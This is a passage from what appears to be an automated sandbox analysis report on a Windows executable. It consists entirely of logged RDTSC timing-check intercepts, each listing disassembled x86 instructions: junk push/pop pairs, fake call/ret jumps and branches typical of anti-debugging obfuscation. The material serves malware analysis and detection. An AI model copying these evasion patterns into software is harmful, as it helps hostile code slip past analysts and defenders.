[ebp+122D01D1h] 0x00000051 cld 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007FD164D1C758h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Dh 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e mov bh, 44h 0x00000070 nop 0x00000071 jl 00007FD164D1C779h 0x00000077 push eax 0x00000078 push edx 0x00000079 jno 00007FD164D1C756h 0x0000007f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117B8A8 second address: 117B8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD164C54716h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117B8B5 second address: 117B943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b and bx, 26E1h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD164D1C758h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FD164D1C758h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push edi 0x0000004a push ebx 0x0000004b jnc 00007FD164D1C756h 0x00000051 pop ebx 0x00000052 pop edi 0x00000053 push eax 0x00000054 pushad 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 jmp 00007FD164D1C75Eh 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FD164D1C75Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117E9DE second address: 117EA8E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD164C5471Fh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 jl 00007FD164C5472Fh 0x00000019 jmp 00007FD164C54729h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FD164C54718h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a movzx edi, di 0x0000003d mov dword ptr [ebp+12484A1Eh], eax 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FD164C54718h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D3430h], ebx 0x00000065 xchg eax, esi 0x00000066 pushad 0x00000067 jmp 00007FD164C54729h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117EA8E second address: 117EA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117FB22 second address: 117FB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117FB26 second address: 117FB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117FB2C second address: 117FB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117FB30 second address: 117FB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1180B12 second address: 1180B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117CB96 second address: 117CB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117EC9D second address: 117ECAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD164C54718h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 117CB9C second address: 117CBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1181D97 second address: 1181D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1181D9B second address: 1181E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD164D1C758h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sbb bx, A400h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sbb di, 63F2h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b add dword ptr [ebp+122D1859h], esi 0x00000041 mov eax, dword ptr [ebp+122D1175h] 0x00000047 mov ebx, edx 0x00000049 push FFFFFFFFh 0x0000004b jmp 00007FD164D1C767h 0x00000050 push eax 0x00000051 jo 00007FD164D1C760h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1187733 second address: 1187742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jng 00007FD164C54718h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1187742 second address: 1187761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD164D1C756h 0x00000009 jmp 00007FD164D1C764h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111A297 second address: 111A2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD164C54716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111A2A1 second address: 111A2CA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD164D1C756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD164D1C767h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111A2CA second address: 111A2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111A2CE second address: 111A2F3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD164D1C756h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD164D1C767h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 118BBA8 second address: 118BBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD164C54716h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 118BBB6 second address: 118BBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 118BBBA second address: 118BBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 118BBC6 second address: 118BBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 118BD74 second address: 118BD87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1190353 second address: 1190374 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD164D1C763h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD164D1C756h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1127BA7 second address: 1127BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1190C42 second address: 1190C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1197CBF second address: 1197CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11971AB second address: 11971AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119730F second address: 1197326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164C54723h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1197326 second address: 1197352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C764h 0x00000009 jmp 00007FD164D1C764h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1197352 second address: 1197356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1197491 second address: 1197495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1197495 second address: 11974A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FD164C54716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11974A1 second address: 11974A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119C519 second address: 119C51F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119C51F second address: 119C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD164D1C756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119C52B second address: 119C52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116945A second address: 116946F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169582 second address: 116958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116958E second address: 1169592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11698C1 second address: 11698D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FD164C5471Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169BE4 second address: 1169BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169BEA second address: 1169BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169C97 second address: 1169C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116A310 second address: 116A316 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116A316 second address: 116A333 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD164D1C760h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169E38 second address: 1169E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1169E3C second address: 1169E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FD164D1C75Ch 0x00000010 jng 00007FD164D1C75Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116A78D second address: 116A797 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD164C5471Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116A797 second address: 114EFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007FD164D1C769h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ebx 0x00000012 nop 0x00000013 movzx edx, cx 0x00000016 mov dx, si 0x00000019 call dword ptr [ebp+122D26EDh] 0x0000001f jnc 00007FD164D1C783h 0x00000025 push eax 0x00000026 jne 00007FD164D1C75Ch 0x0000002c jc 00007FD164D1C75Eh 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119B78D second address: 119B791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119BB59 second address: 119BB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119BB5D second address: 119BB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119BCCC second address: 119BCF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD164D1C756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD164D1C763h 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 js 00007FD164D1C756h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119BF9F second address: 119BFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Dh 0x00000007 jmp 00007FD164C54721h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 119BFC1 second address: 119BFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD164D1C756h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A1922 second address: 11A192E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007FD164C54716h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A1D5F second address: 11A1D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD164D1C756h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A1D81 second address: 11A1D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A2078 second address: 11A2084 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD164D1C756h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A2084 second address: 11A208A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A21CE second address: 11A21D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD164D1C756h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A21D9 second address: 11A21E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FD164C54716h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A2664 second address: 11A2670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A2670 second address: 11A2674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A131C second address: 11A1363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C75Ch 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FD164D1C75Eh 0x00000013 jg 00007FD164D1C775h 0x00000019 jmp 00007FD164D1C769h 0x0000001e jne 00007FD164D1C756h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A1363 second address: 11A136B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 112B159 second address: 112B177 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD164D1C768h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A7B73 second address: 11A7B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A7B79 second address: 11A7B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C760h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A7B8F second address: 11A7B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11A7B98 second address: 11A7B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B125C second address: 11B1287 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD164C5471Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007FD164C5471Ch 0x00000015 push edi 0x00000016 jmp 00007FD164C5471Bh 0x0000001b pop edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B00D6 second address: 11B00E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0AE8 second address: 11B0AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0AFA second address: 11B0B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0B00 second address: 11B0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0B07 second address: 11B0B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164D1C767h 0x00000008 jo 00007FD164D1C756h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0B29 second address: 11B0B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0C49 second address: 11B0C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD164D1C756h 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD164D1C756h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0F2E second address: 11B0F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0F3A second address: 11B0F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B0F3E second address: 11B0F61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Ch 0x00000007 jg 00007FD164C54716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jns 00007FD164C54716h 0x00000016 pop esi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11B2934 second address: 11B293A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
